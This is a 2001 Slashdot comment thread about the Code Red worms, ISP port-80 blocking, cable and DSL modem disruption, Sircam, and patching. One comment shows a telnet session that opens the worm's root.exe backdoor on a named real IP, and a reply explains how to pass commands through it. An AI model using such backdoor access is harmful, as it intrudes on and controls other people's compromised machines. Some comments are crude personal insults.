    To specify more specifically for the people misunderstanding this poorly worded post, port 80 is not completely blocked. Only the _INCOMING_ connections to port 80 are blocked, so only people running webservers are infected. Because I currently run a webserver using Apache under Linux on my MediaOne cable modem, I am currently on hold on the MediaOne tech-support line attempting to get port 80 unblocked.

  133. Against the DMCA? by duncan · · Score: 2, Funny
    From the article:

    "The group gathered around the dinner table then managed to get a copy of the worm and began disassembling its code"

    Doesn't looking at the code and trying to figure a way around the usage of this program violate the DMCA? I think that those at this conference should be held accountable.

    1. Re:Against the DMCA? by jmv · · Score: 2

      What if somebody releases a virus and protects it under the DMCA? Does that mean it won't be legal to write an anti-virus for it? (that too could be a good way to fight DMCA)

    2. Re:Against the DMCA? by Anonymous Coward · · Score: 0

      They were in Canada.

    3. Re:Against the DMCA? by Anonymous Coward · · Score: 0, Insightful
      Doesn't looking at the code and trying to figure a way around the usage of this program violate the DMCA?

      Is the virus a copy protection measure? No. Now go away, please.

  134. Cable Modem Providers by r1ckt3r · · Score: 2, Funny

    I work for a rather large cable modem provider in the callcenter. We are getting inundated with calls about the Code Red virus. Especially concerning hyper-active activity lights on cable modems. It's been like this ever since Sunday. I must admit, we are very close to blocking port 80 as well, since we don't allow web servers anyways. Oh well, I start my new job next Monday.

    1. Re:Cable Modem Providers by Anonymous Coward · · Score: 0

      It is not worth it. The most bandwidth I've seen being used is about 40kbps (kilobits) of ARP requests on a cable segment. 40kbps out of a possible 26Mbps on a QAM64 modulated cable segment is nothing.

  135. @Home not blocking port 80 yet by interiot · · Score: 3, Informative

    @Home's AUP specifically says "no servers". Also, they've always blocked port 137, so the tools are already installed. Yet they still haven't blocked port 80, even though each IP is getting hit approximately every other minute.

    1. Re:@Home not blocking port 80 yet by KilljoyAZ · · Score: 1

      If they haven't yet, they will. The customers they'd drive away by cutting off web server access probably don't outweigh the tech support nightmare they're facing now.

      Of course, anyone intent on running a server will switch to port 8080 or something. Does Code Red port scan, or just connect to port 80?

      --
      This .sig is currently on hiatus for retooling.
    2. Re:@Home not blocking port 80 yet by muxmaster · · Score: 2, Informative

      The contract I signed specifically said "No commercial servers." I checked this very carefully before signing it to ensure that they have no contractual right to pull my account for running a personal web server. Of course, this was when MediaOne was Roadrunner, not @Home, but they cannot unilaterally change the agreement without notice.

    3. Re:@Home not blocking port 80 yet by GoNINzo · · Score: 2

      On some segments, they have. If you're on what was MediaOne's old segments, they have set it up. They just haven't admitted it yet. They say 'no servers' but they actually mean 'no servers for public use'. I personally consider every machine in my house a server... heh

      --
      Gonzo Granzeau
      "Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
    4. Re:@Home not blocking port 80 yet by Anonymous Coward · · Score: 0
      but they cannot unilaterally change the agreement without notice

      Are you sure? Most contracts specifically say they CAN be unilaterally changed at any time. Although it doesn't really matter, they won't notice or care about your servers unless you use a lot of bandwidth (or are spreading worms).

    5. Re:@Home not blocking port 80 yet by igor_p · · Score: 1

      I think it depends on where you are.
      @home have always blocked port 80 where I live along with 137 and 139.

    6. Re:@Home not blocking port 80 yet by grunby · · Score: 1

      Sure they say no servers, but a simple
      route add -host 24.0.0.203 reject
      works wonders

      - grunby

    7. Re:@Home not blocking port 80 yet by Anonymous Coward · · Score: 0

      The AUP I signed didn't say anything about servers, only that I could not "resell @Home bandwidth", which I'm not, since I don't charge anyone for use of my server.

    8. Re:@Home not blocking port 80 yet by h0tb0x · · Score: 1

      That address only scans for open news server relays because of a rash of problems with usenet. It doesn't look for anything else.

      --
      The phone, the bane of my existence, rings. "Hello, Computer Room" I say, being helpful - BOFH
    9. Re:@Home not blocking port 80 yet by sharkey · · Score: 2

      It's not likely that they will in INDY, as they are too fscking stupid here. And I'm getting hit pretty hard here, the lights on my modem would give an epileptic one hell of a time.

      Thanks to Linus, Alan and all the others who made my firewall possible.

      --

      --
      "Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
  136. Windows related by Anonymous Coward · · Score: 0

    Some companies will always try to minimize potential risk to your network if it's windows related.

  137. This sucks by r0ach · · Score: 0

    I'm quite upset right now... I run a few fairly popular websites from my cable connection, and I'm not even running IIS, or Windows for that matter, so why do I (and my viewers) have to suffer? I can understand why AT&T is doing it, but still, it irks me... Just another example of Microsoft (indirectly) screwing over people that don't even use their software...

    --
    -- www.RoachMcKrackin.com
  138. Watch Code Red infect by iNiTiUM · · Score: 1

    I've set up BitchX and a shell script to monitor Code Red attempts to my AT&T based Apache server. They are 100% right about AT&T being nailed hard, and yes the ARP traffic is thru the roof.... Irc.Piratesnet.Net on #CodeRed if anyone's interested :)

    --
    When encryption is outlawed, ou++1!@(93j++js-d9298yIUH(*Y24JKB!~
    1. Re:Watch Code Red infect by kfuq · · Score: 1

      No Kidding at all! Come to irc.piratesnet.net and join #codered to check it out! ! ! Current Date & Time: Tue Aug 7 16:31:16 PDT 2001 Code Red First Strain hits: 55 Code Red Second Strain hits: 2547

      --
      iF yOu WAnT to C YOUr iP agaIn gAThEr tWO MilLIon dOLLArS IN Non - cONsEcuTivE TweNtY's AnD AWaiT FuRThER iNstrUctIoN
  139. damage only _medium_ to self ! by cyrilc · · Score: 1

    the problem is medium because from a user's point of view, the damage is relatively low risk for the computer compared to reformatting the hard drive or erasing the BIOS

    who said Symantec cares for ISP and other system maniacs !!!

    their only interest is to sell you the latest anti virus that can protect your Winblows <whatever> against naughty worms or viruses...

  140. hrm. correction by bacchusrx · · Score: 1

    Hm. Slashdot ate part of my ping example ;p the correct command should've been:

    ping xxx.xxx.xxx.xxx > /dev/null &

    where xxx, etc. is your gateway's IP.

    You all assumed that anyways, but... ;)

    BRx.

    --
    Life after capitalism? The participatory economics project
  141. There seems to be a newer variant by friday2k · · Score: 2, Informative

    or the worm has a sleeping behaviour pattern. Please review the following message from the Securityfocus Incidents Archive (the message was sent 30 minutes ago)

    1. Re:There seems to be a newer variant by Bender+Unit+22 · · Score: 2

      I like the way that he has removed the IP of the target, but forgot to remove it in the hex dump so that it is clearly viewable.
      Not that it matters. :-)

    2. Re:There seems to be a newer variant by steve.simms · · Score: 2, Informative

      That exploit is a much older one using unicode characters in the URL which was patched between SP1 and SP2.
      See http://www.securityfocus.com/bid/1806 for details.
      I am getting about one attempt every hour using variants on that exploit - all from address blocks in mainland China.

  142. No change here by NullPointer · · Score: 1

    I'm connected through MediaOne (AT&T@Home) and I've not seen any evidence of blocking. The log has not shown a reduction in connection attempts since I first noticed something was happening Saturday afternoon, typically 1 to 4 attempts per minute. And, unlike what some others have reported, I've not seen any degradation in service. The continuous blinkin' lights are sort of annoying though.

    --
    NULL
    1. Re:No change here by Anonymous Coward · · Score: 0

      I've got AT&T @home (Connecticut), no idea who MediaOne is though :)

      I also have no slowdown in attack. Port 80 is still wide open for incoming.

    2. Re:No change here by NullPointer · · Score: 1

      Yeah, I'm not sure about the business details, a few months ago we were informed that MediaOne was taking over all of AT&T's broadband here in Boise. I did some checking and found that MediaOne is essentially an AT&T subsidiary (they were/are the majority stockholder). I still get the same bill from the same address, only the name has changed. If you go to MediaOne's site (http://www.mediaone.com) you simply get redirected to the AT&T broadband page.

      --
      NULL
  143. My 'Data' Light has been going steady since Friday by BroadbandBradley · · Score: 3, Funny

    and I'm on @home's network. I like the program 'etherape' to sit and watch the requests come in and then browse to the IP's to see JoeBlow's homepage.
    really, do these home users PAY for IIS? of course not, would you? If you're going to use software free, use free software!!!
    I can't imagine that anyone who administers servers for a living hasn't already patched against this. Thus I think most of this Code Red comes from home users' Windows boxes with pirated software. I wish MS did pursue those people because we'd have a whole lot more Linux users if that was the case. ( I guess that's why they don't)

    a note to IIS users: /etc/httpd.conf it's not really that hard.

  144. A Rash of very well written viruses by Peridriga · · Score: 1
    Along w/ Code Red (no need to explain how well this has propagated) Sircam has also caused general havoc w/ the computers I support at work.
    Yeah, it's an Outlook specific virus and now after this infection I've finally gotten my "higher-ups" to get away from the Microsoft syndrome. After the initial infection, spread, and removal of Sircam I did some research and found it to be an extremely well written virus.

    The interesting details:
    1) Of course it does the all-too-common spread through Outlook's address book.

    Sidenote: It also attaches the last document used (gotten from the 'recent' directory) to the spread email. Which in our case luckily didn't send out any sensitive data but, more than likely could have. This also has generated a huge peak in our network traffic. (Imagine our database department (30 computers) all sending out our 200MB dBase files to every address listed)

    2) Also the virus scans all of the resident HTML cache and pulls out every email address listed in it

    3) Then, connects to every shared computer it can find w/ write access and infects that as well

    4) And the kicker that I love so much, is that it is bi-lingual. If it detects the native system's language as Spanish it will send all the emails out en espanol.

    Just a little course to those not completely familiar w/ our newest addition to the viruses that plague IT specialists.

  145. RoadRunner Fairfax VA unusable by banky · · Score: 4, Interesting

    Here in Fairfax, our cable modem dropped out around 6pm Sunday night; it came back up after about an hour, but ever since then, I've had faster speeds on dial-up.

    The phone system reports that SirCam has taken out their email servers, and that Code Red [I|II] is causing serious performance problems. They expect to have it done by tomorrow - except that today, when I called, they no longer are saying that, merely begging users to patch their systems.

    Phone tech support is turned off, at least in my wanderings in the phone system.

    Anyone else having these problems?

    --
    ZOMG I WOULD LOVE TO KNOW ABOUT YOUR FEELINGS ON MACINTOSH VERSUS WINDOWS, VI VERSUS EMACS, AND HOW YOU'RE NOT A DORK
    1. Re:RoadRunner Fairfax VA unusable by mashy · · Score: 1

      Yep, the Data light has been on more solidly in the last week than the Cable light has in the last year.

      Don't expect Cox to do anything about it. They wouldn't know it if they had CodeRed on ams-server.

    2. Re:RoadRunner Fairfax VA unusable by Anonymous Coward · · Score: 0

      I'm in Fairfax near George Mason U. Our service dropped to a crawl late Sat afternoon - and when I did reach someone in Tech support Sunday they said it was a "scheduled outage" to do some "Router updates" and they expected to have them back to standard performance by Weds. 4 Days downtime for "planned service work" yeah right. I think he was talking out of his butt, frankly. I had to dig out my old USR Courier to dial in elsewhere tonight and grab emails - and check Slashdot ... I'd try Verizon if I thought they had any more clue than Cox about connectivity - but when I tried them a year ago they were off for most of the first week, and I never gave them a second week. Isn't it interesting that these folks claim to be communications firms but don't understand the first thing about communicating with their customers.

  146. @Home by Micah · · Score: 2

    Well I'm on @Home and I'm not sure if this has to do with Code Red or not, but my cable modem light indicating bandwidth use has been flashing pretty much CONSTANTLY since Sunday or so, even when the computer was off!

    I know it's more than port 80 hits, because there's not a constant stream of them in my log file, and I don't even run the web server most of the time. I get plenty of them when it does run, but it's got to be more than that.

    1. Re:@Home by mr.+roboto · · Score: 1

      I've got the same thing on my @Home modem--constant blinken lights, whether or not the computer is on. Still, the only DENYs in my firewall log (I've got port 80 closed off completely) are SYN packets to port 80. Not sure why this results in the constant blinking.... I'm almost certain that it can be attributed exclusively to Code Red, though.

    2. Re:@Home by h0tb0x · · Score: 1

      We're seeing approximately 1000-1500 ARP requests per minute on any given node at the cable ISP I work for as of 11am this morning, could be more by now. We aren't looking at filtering port 80 however. My receive light has been solid for 3 days because of this. Fortunately my Linux box isn't vulnerable but it's sure filling the logs nicely.

      --
      The phone, the bane of my existence, rings. "Hello, Computer Room" I say, being helpful - BOFH
  147. Re:fp by Anonymous Coward · · Score: 0

    I'm claiming ALL your fp's because you're a spastic fuckwit AC!!

    er.. wait a second...

  148. Indirect cost. by Fat+Casper · · Score: 1
    With insurance companies charging more to insure companies that run MS servers and every new virus/worm headline, why do people stay there? MS doesn't cost me any money directly, but I wonder what prices out there would be lower if companies didn't need to give Bill more money that he already doesn't need.

    How much better would software in general be without the anticompetitive practices, "standards" and "enhancements?" How much smoother would the net run if admins could plug all their security holes as they became known, not just when MS deigns to acknowledge that they exist and provides a band-aid? What prices out there would be lower if companies didn't have those extra costs? What profits (other than Bill's) would be higher? I'm sorry, but it just pisses me off.

    --
    I spent a year in Iraq looking for WMD and all I found was this lousy sig.
  149. So that's what it is! by Francis+Frisina · · Score: 1
    From the "Code Red" link on E2: "A red version of Mountain Dew, a soft drink second in caffeine content only to Jolt, openly marketed to the urban, minority community. The desire to penetrate minority markets was so prominent that Pepsi largely chose the drink's flavor in order to do so. At first, the company toyed with the idea of coloring the new soda blue and sticking "arctic" in the name. But conventional wisdom in the soft drink business states that people from minority groups favor sweet, fruity flavors. So, the company's researchers regrouped and came up with Wild Cherry Mountain Dew. The taste was right, but the name was too tame. Enter Code Red."

    Of course, if you want to know what the Code Red Worm is, you might want to check out: http://www.everything2.com/index.pl?node_id=1126739&lastnode_id=1037487

    --
    "The universe is a womb for the genesis of gods."
    1. Re:So that's what it is! by Anonymous Coward · · Score: 0

      If you're interested, the Code Red virus was named after the soft drink because the initial security group that detected and analyzed the virus used Code Red Mountain Dew to stay up all night doing the work. Just a friendly bit of trivia for anyone who thought the name of the virus a little melodramatic.

  150. Crazy by zexxxx · · Score: 1
    It's just crazy that I still get hits because of this stupid virus. Just a waste of bandwidth and hdd space in log files.

    I just feel that it should be reasonably complex to set up such servers. Not just for M$ which is Plug and Play (BSO.. oops... PnP) but also with linux. For example, an apt-get install of telnetd on a debian system adds the service to inetd by default, no questions asked. I don't know how other distros are like, but the consolation for linux users is that they are usually younger than grandma.

  151. Digital Honeypots by Anonymous Coward · · Score: 0

    "I noticed a sharp increase in activity," Mr. Levy said. So he set up a "honeypot," or computer intended to lure attackers, to get a copy of the worm

    Oohh, a digital "honeypot" to "lure" attackers. Maybe it sends out a digital scent irresistible to worms. It's all very mysterious, but he's an expert, so I'm sure he knows what he is doing.

    Or maybe it is as simple as a random ip on a cable provider like rr.com, where my port 80 was getting hammered about 1000 times an hour between 2 AM and 5 AM Sunday morning. Logs, anyone?

  152. heh by Anonymous Coward · · Score: 0

    no hablo espanol, shithead

  153. Does the back door actually work? by Anonymous Coward · · Score: 1, Interesting

    % telnet 128.134.111.8 80
    Trying 128.134.111.8...
    Connected to 128.134.111.8.
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Tue, 07 Aug 2001 22:47:22 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.

    c:\inetpub\scripts>

    It gives a command prompt, but typing commands doesn't seem to do anything...

    1. Re:Does the back door actually work? by Anonymous Coward · · Score: 0

      You have to embed the commands within the URL.

  154. OT: pedantic correction by rkent · · Score: 2, Insightful
    I don't know if it works, I don't have a Win boxen to test it on...

    Okay, if you're going to use the archaic, tongue-in-cheek unix-guru term "boxen," at least bother to learn that its denotation is plural.

    And now back to your regularly scheduled worm discussion.

    1. Re:OT: pedantic correction by grammar+fascist · · Score: 1

      This looks like a job for the Grammar Fascist.

      I don't know if it works, I don't have a Win boxen to test it on...

      Let's rewrite it:

      I don't know if it works, I don't have a Win boxes to test it on...

      That looks just fine to me.

      --
      I got my Linux laptop at System76.
  155. As one of those blocked by smnolde · · Score: 1

    Yes I noticed this early this morning. It appears my code red hits stopped shortly after 11:05pm last night.

    They might have blocked 80 from the outside world, but internal infections can still take place.

    I can connect to a few IPs that affected me within the 24.163.x.x network.

    On the chat with tech support they have no date when the block will be lifted.

  156. Why code red is still around by jerrytcow · · Score: 1

    I was looking at my server log, and couldn't believe how many hits from the second round Code Red it received. I did a DNS lookup on a few of the addresses (most of the hits seem to be from 64.x.x.x). Several are from 64.4.13.232 (msgr-cs22.msgr.hotmail.com).

    At first I was astounded that so many users could be running IIS still unpatched, but if sites like Hotmail can't patch their servers, how can we expect the average home user to?

    1. Re:Why code red is still around by Yorrike · · Score: 1

      So Microsoft can't even patch their own servers? That instills a sense of confidence to no end

      Damn, bloody nimrods.

      --

      Looks can be deceiving. Or CAN they?

    2. Re:Why code red is still around by RWC09 · · Score: 1

      And these are the people who want you to TRUST them to look after ALL your personal data!!!

      --
      -->If Linux was written by Bill Gates & Co. - no one would want to switch !!
    3. Re:Why code red is still around by Wntrmute · · Score: 1

      Here's my favorite that attacked me.

      bangalore-cache-1.cisco.com

      Even Cisco won't patch their IIS servers.

  157. RoadRunner by mattvd · · Score: 1

    I'm on Road Runner, and my firewall is logging between 10 and 30 requests per minute -- most of these coming from within the road runner network (24.x.x.x range).

    The funniest thing though-- if you go to just about any of these IP addresses with a web browser, it's the default page for IIS. Meaning someone set up a web server (perhaps unknowingly) and forgot about it.

    1. Re:RoadRunner by kalos · · Score: 1

      Just a huge FYI but AOL/TW doesn't own the 24.x.x.x network. RoadRunner uses it just as @Home and any other cable modem service. It was the original set of IP addresses for such service.

  158. Crikey by Illserve · · Score: 3, Interesting

    Code red is so profligant (because it requires no user intervention to spread), that a new machine installation will likely be hit by it in 10 minutes or less, which of course, is less time than it takes to patch it, which of course means that until you patch it, the remote exploitation is free to install anything else it wants until you close the hole, so you're going to be left with a zombiefied machine unless you install and patch from an airgapped machine, using a local copy of the patch. I doubt most people do that.

    So even with the patch up and available, the problem is far from solved. I bet the number of zombie machines out there surged 10fold today, many of which are on high speed corporate bandwidth, instead of the more meager cable modems with severely crippled upstream access.

    It's going to be a rough year.

    1. Re:Crikey by interiot · · Score: 1

      step 1: download patch
      step 2: apply patch (hole plugged, no additional worms will infect)
      step 3: reboot (preexisting worms disappear)

    2. Re:Crikey by SuperKendall · · Score: 2

      step 1: download patch
      step 1.5: Code Red III installs itself (just after install and before you can even apply a patch)
      step 2: apply patch
      step 2.5: Code Red III reverses patch
      step 3: reboot (preexisting worms disappear, server still vulnerable)
      step 4: Code Red III installs itself...

      Alternate step 1.5: Remote user gets pinged from your machine by Code Red and decides to run a format c:/ before you can patch the box.

      --
      "There is more worth loving than we have strength to love." - Brian Jay Stanley
    3. Re:Crikey by mcleodnine · · Score: 1

      45 Seconds to the first infection according to a recent msnbc article. I'm getting one hit at least every two minutes. Although that may fix the CodeRedII back door, it won't remove any trojans that may or may not have been pushed to the offending rig during active infection.

      --
      one better than mcleodeight
    4. Re:Crikey by moeman · · Score: 1

      People keep saying that a new machine will be hit in 10 minutes. But I have had an apache server running since this started, and I have not seen a single log entry with a bunch of "XXXX"'s or "NNNN"'s. The interesting part is, it is on a college campus (which has a large summer student population). Given that all students are required to own a computer, and most of them leave it on all the time, why haven't I seen a huge number of hits? Anyone know?

      --
      Ambition is a poor excuse for not having enough sense to be lazy.
    5. Re:Crikey by Anonymous Coward · · Score: 0


      It's "profligate", you dumbass.

    6. Re:Crikey by mimbleton · · Score: 1

      Just disable damn www service until reboot with patched box.

  159. Damage rating by Anemophilous+Coward · · Score: 1

    Perhaps their damage rating only refers to immediate damage done to the machine. There is no web defacement, mass amounts of files are not deleted, the drive isn't reformatted. Of course, all this *could* be done via the installed backdoor.

    -A non-productive mind is with absolutely zero balance.
    - AC

    1. Re:Damage rating by Todd+Knarr · · Score: 2

      Then Symantec's done lost their minds. Remote root/shell access is the worst thing that can happen, because after that you're basically at the mercy of the cracker until you've sanitized the machine again. Complete destruction of the disks is nowhere near as bad as having someone who can eavesdrop on every password on your machine or steal any data he wants or alter any data he wants.

  160. sorry by Anonymous Coward · · Score: 0

    just got off the phone with your mom. she said she wants to blow you.

  161. Possible Simple Large ISP solution by sportal · · Score: 1

    Can someone please tell me why the big ISPs just don't take this simple approach to handling the increased traffic by Code Red I & II.

    1. Run IDS at the backbone level.
    2. When you see a packet come across that is a Code Red I or II web server probe (it is real simple in detecting this), mark down the IP address.
    3. Transfer the IP address to your routers and drop all packets coming from that machine for a period of time (say 2 days).

    Ta da .. Suddenly you stopped all the excess traffic that is happening from these infected machines probing your network.

    Better yet, why aren't they turning off the connections of machines that are infected and thus generate the majority of the traffic on their network?

    Road Runner in NYC is getting a ton of traffic (mainly ARP requests from the machines looking for hosts) because of Code Red. No packet loss though.

    1. Re:Possible Simple Large ISP solution by Anonymous Coward · · Score: 0

      1. Run IDS at the backbone level.

      That's not so easy.

      2. When you see a packet come across that is a Code Red I or II web server probe (it is real simple in detecting this), mark down the IP address.

      There is no way to detect the scan. It is a simple SYN packet to port 80. Only once it encounters a web server and delivers the payload can it be detected. Just the SYN request is what is causing the rise in ARP requests and traffic levels.

      3. Transfer the IP address to your routers and drop all packets coming from that machine for a period of time (say 2 days).

      Most routers are not powerful enough to check a list of several thousand hosts before forwarding a packet.

  162. Cutting off Port 25! by BigBlockMopar · · Score: 2

    If @home blocks my port 80 i'll be quite pissed.

    My ISP (www.dsl.ca) specifically allows you to run servers - and even rents a static IP. Then, one day recently, they surprised me by firewalling all outgoing SMTP. Of course, this coincided with a BIND change on my nameserver, and so when my mail spool started to fill up, my first assumption was that I'd killed the reverse lookup! I spent an hour or so trying to figure out how I'd gone wrong, but I didn't think I did. Finally, I contacted 'em about it. They just shut it off because there were too many spammers and they didn't want to do a mass-mailing, which would become a tech support nightmare ("uhh... this port 25 thing, do I need it?").

    Anyway, I'm starting to get really annoyed by Code Red II. My webserver log file is full of IIS crap. I hold Microsoft responsible for marketing a faulty product.

    Yes I'm lame, I'm running IIS (patched) on my cable modem.

    You are lame, for sure. You know, it's really not that much work to set up an old 486 or something with FreeBSD and NAT, add Apache from the ports collection, and laugh at all the IIS lusers. Please ditch IIS; I'll provide a helping hand if I can.

    --
    Fire and Meat. Yummy.
  163. tired? by Anonymous Coward · · Score: 0

    but are you as tired as your dad was after i finished fucking him in the ass?

  164. No patch for Alpha NT 4 machines by BrookHarty · · Score: 2

    No patch for Alpha NT4 machines. I had to remove Indexing, no big deal, but damn virus even hit Alpha cpus.

    1. Re:No patch for Alpha NT 4 machines by Anonymous Coward · · Score: 0

      what? shouldn't the worm be in x86 code?

  165. to block codered on the firewall by atif_ghaffar · · Score: 1, Informative

    Our webservers have also been getting requests for default.ida stuff. I have written a couple of short scripts to block them on the firewall. The scripts are available at http://www.ispman.org/blockcodered

  166. Re:What ports does the worm attack? by Anonymous Coward · · Score: 1, Informative

    Depends. If you are on a modem, you will see an occasional SYN packet with a destination port 80. If you are on a cable modem or shared segment that is accessible to the Internet, you will see a lot of ARP requests for nonexistent machines along with the SYN packets. If it hits a machine with a web server on it, you will see the malicious URL (its payload) sent to the host.

  167. well in that case... by Anonymous Coward · · Score: 0

    i'll happily reward it to you :-)

  168. CISCO DSL Modem Getting Hammered? by Dasein · · Score: 1

    I've had to reboot my cable modem recently every night to restore connectivity. My ISP just sent out an email saying the CISCO cable modem that I'm using is getting hammered by Code Red.

    Here's the quote "With the Cisco 67x series, as well as HP print servers, 3Com switches, and almost all other embedded web server applications, the worm causes a buffer overrun which causes the device to lock up."

    Is this really true? It seems pretty unlikely that almost all embedded web server applications have a buffer overrun. It seems possible that a few devices do.

    Anybody have more info?

    --
    You are not a beautiful or unique snowflake -- but you could be if you got off your ass.
    1. Re:CISCO DSL Modem Getting Hammered? by Anonymous Coward · · Score: 0

      Qwest's DSL service [both to their Qwest.net customers and folks using them for service and someone else for ISPs] has the exact same issue with the Cisco 67x gear. I had to go into my box and do a "web disable" in order to keep it from crashing every few minutes.

      Of course, that was last month.

    2. Re:CISCO DSL Modem Getting Hammered? by Anonymous Coward · · Score: 0

      Here in Minneapolis our Cisco 675 locks up 15 times a day. Our ISP ( Qwest ) has huge waits on their support line. Their web site has no information about the issue. Another example of the great customer service from a local monopoly.

    3. Re:CISCO DSL Modem Getting Hammered? by Anonymous Coward · · Score: 0

      Actually one of Qwest's users has an excellent
      page up:

      http://www.users.qwest.net/~rlutton/ADSL/

      And see Qwest's site here:

      http://www.qwest.com/dsl/customerservice/redcodevirus.html

    4. Re:CISCO DSL Modem Getting Hammered? by kfuq · · Score: 1

      I am TOTALLY FED UP with qwest. Every time i call the tech line.. "your expected hold time is 114 minutes" This is Horrible customer service! I have been having to reboot my modem 40-50x/day! They said that they have a "fix" for the cisco modems, by changing the web port on the modem, but that s**t doesn't werk at all, so don't let 'em tell ya different .. TO TOP IT ALL OFF .. They are partnering up with M$ ... Oh boy what fun. Guess money rules and all resemblance of common sense is right the hell out the window. Time to get a different isp i believe.. check out our real-time code red display.. irc.piratesnet.net and join #codered

      --
      iF yOu WAnT to C YOUr iP agaIn gAThEr tWO MilLIon dOLLArS IN Non - cONsEcuTivE TweNtY's AnD AWaiT FuRThER iNstrUctIoN
    5. Re:CISCO DSL Modem Getting Hammered? by Anonymous Coward · · Score: 0

      Visit http://www.seanet.com/help/codered.shtml Qwest is a bunch of morons and most of your "cheap" ISPs are as well. I'm biased because I work for Seanet. We charge more but you get what you pay for. We figured out the fix 2 days before Qwest did.

    6. Re:CISCO DSL Modem Getting Hammered? by Peter+H.S. · · Score: 2

      I've had to reboot my cable modem recently every night to restore connectivity. My ISP just sent out an email saying the CISCO cable modem that I'm using hammered by Code Red.

      Here's the quote "With the Cisco 67x series, as well as HP print servers, 3Com switches, and almost all other embedded web server applications, the worm causes a buffer overrun which causes the device to lock up."

      Is this really true? It seems pretty unlikely that almost all embedded web server application have a buffer overrun. It seems possible that a few devices do.

      Anybody have more info?

      Well Cisco has put out an advisory for 'unpatched' 6xx DSL modems.
      see:
      http://www.cert.org/advisories/CA-2001-19.html
      However, the Cisco problems are not the same as the MS buffer overflow, but are triggered by the CR scanning nevertheless.

      I have seen several mentions of other types of equipment that seem to react badly to CR scanning. Probably because it is "easy" to give a piece of equipment an IP address and a web-server for remote management. But most of this equipment was designed to operate inside a nice and friendly LAN, serving well-formed requests. Of course, not all embedded web servers suffer under the CR scanning, and those that do are probably affected by memory leaks, caused by high load, that require a reboot.

      The scary truth probably is, that security, as usual, wasn't high on the list when all those devices were designed.

      Security is hard to design and maintain, but also hard to sell to customers.

      Sites running transparent proxies, (from MS-proxy, MS-ISA?, Cisco, Squid, etc), may experience severe resource depletion if infected. See http://archives.neohapsis.com/archives/bugtraq/2001-08/0078.html
      Other products using "embedded" MS IIS are affected too.

      What is thought-provoking about CRII, is its spreading algorithm, favoring IP addresses close to the infected host. This is of course much more efficient than random numbers, but also seems to make it easier for it to infect hosts _inside a LAN_ on "misconfigured" networks:

      Host A on the inside LAN /DMZ cannot be reached directly from the Internet, but it "trusts" Host B, on the hostile Internet. So when Host B is infected, Host A gets it too, and starts spreading the infection deep into the LAN.

      And in my experience, hosts and equipment inside the LAN are rarely patched and tied down with the same vigour as Internet hosts.

      It is of course bad network design that allows this to happen, but a lot of sites are nevertheless configured that way, because it makes things easier.

    7. Re:CISCO DSL Modem Getting Hammered? by Anonymous Coward · · Score: 0

      I'm running 2.4.1 on my Cisco 675 DSL device. It was crashing several times a day, despite having "web disable". I had to also change the web port to something other than 80...I guess the 675 accepts the packet, then checks if the port is disabled...or it would if it hadn't crashed already.

  169. mediaone (at&t broadband) has not cut access by self+assembled+struc · · Score: 1

    I'm on a cable modem in boston and my server is responding just fine on all my ports.

    1. Re:mediaone (at&t broadband) has not cut access by EvilMagnus · · Score: 1
      I'm in Boston, on Mediaone/ATT, and they're blocking port 80 at the first point they can : somewhere *upstream* of your local node. I can get to port 80 from either side of my router, and get to other folks' web sites in my subnet (gee, thanks, CodeRedII, for 500+ unique IPs of infected MORONS on my subnet!). BUT I can't connect to TCP80 on my server from off the ATT network.

      They started blocking the Cambridge branch several days ago, according to my tests and my logs.

      --
      -EvilMagnus
  170. It happened to me and I know better by Hangtime · · Score: 1

    Preface: I know better, I know what Code Red can do, hell I work in IT so it makes it even worse

    I recently started with my company right out of college and one of my jobs is to optimize queries running against an MSSQL Server. I also own a couple of HDs so I bought trays so I can switch systems without putting my eval copy of SQL on my production system. After installation, I went onto the Internet to start downloading patches and then left because I'm on a 28.8 modem. When I came back I found that I had sent over 6MB and only dl 2.5 and Inetinfo.exe was going nuts. Shit I thought, I got infected. Like I said it can happen to anyone even when you're trying to do the right thing and get all patched up.

    HT

  171. Port 80 blocking on AT&T (aka Mediaone segment) by GoNINzo · · Score: 2
    My server was blocked at 9AM on August 5th. I use it mostly for my resume. I have since relocated my server to port 8080 and it works fine again. I also spoke with a couple different people concerning their blocking port 80, and they totally deny it.

    Wow, that's kind of weird considering the traffic ended at EXACTLY 9AM for old pages I used to host on that server. And wow, someone couldn't get to my resume that day, and emailed me about the problem they had. Very odd. I don't have a problem if they are going to block it for whatever reason, but at least admit it in the Agreement. I just want it for personal use...

    --
    Gonzo Granzeau
    "Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
  172. The Perfect Solution: by Anonymous Coward · · Score: 0

    Microsoft creates a similar internet worm that gains admin access to install the patch! I'll leave it up to you to name it.

  173. Re:HEY!!! by Anonymous Coward · · Score: 0

    listen to what i say to you.

  174. Lame words from ATT Mediaone support page by emptybody · · Score: 1

    What Do I Need To Know About The Code Red Virus?
    What is the Code Red Virus?

    The Code Red virus is a worm virus. The worm is designed to spread the first 20 days of each month and has the potential to disrupt business and personal use of the Internet for applications such as electronic commerce, e-mail and entertainment.

    What does the Code Red Virus do?

    The worm scans the Internet, locates vulnerable systems and infects these systems by installing itself. Each newly-installed worm joins the others. The uncontrolled growth in scanning slows the speed of the Internet and can cause sporadic but widespread outages.

    The virus takes advantage of a defect in Microsoft's Internet Information Services (IIS) software. It affects only computers with the IIS Web server software and Windows NT or 2000 operating systems. Windows 95, Windows 98 and Windows Me operating systems are immune. Therefore, most personal computers in the home cannot be infected. Those users who have computers that have been infected should reboot the machine and install the appropriate Microsoft software patch.

    For Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
    For Windows 2000 Professional, Server and Advanced Server: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800
    Detailed instructions to use the patches can be found below.

    What is AT&T Broadband Doing About the Code Red Virus?

    We're closely monitoring our network and keeping a close eye on how our customers are being affected by the Code Red II computer virus. Our engineering team is running scans of the network to identify infected users. After the scan, AT&T Broadband will alert affected customers to assist them in ridding their computer(s) of the virus.

    How Does the Code Red Virus Affect AT&T@Home Customers?

    You may experience slow connection speeds due to the Code Red II virus traffic across the AT&T Broadband network.

    Please note that AT&T Broadband customers are not being affected any differently than DSL or dial-up users. However, the virus can ping computers much faster on our high-speed network creating slower customer speeds.

